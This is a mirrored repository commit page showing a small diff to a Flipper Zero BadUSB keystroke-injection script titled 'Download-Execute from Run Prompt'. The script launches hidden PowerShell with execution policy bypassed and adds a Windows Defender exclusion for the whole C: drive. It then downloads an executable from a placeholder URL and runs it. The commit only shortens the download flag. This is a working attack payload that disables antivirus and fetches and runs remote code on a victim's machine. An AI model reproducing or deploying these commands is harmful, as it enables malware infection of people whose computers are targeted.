mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-27 05:03:54 -08:00
Update Download-Execute from Run Prompt.txt
This commit is contained in:
@@ -15,7 +15,7 @@ DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1;
|
||||
|
||||
REM replace FILE_URL_HERE below.
|
||||
STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit
|
||||
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
|
||||
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
|
||||
Reference in New Issue
Block a user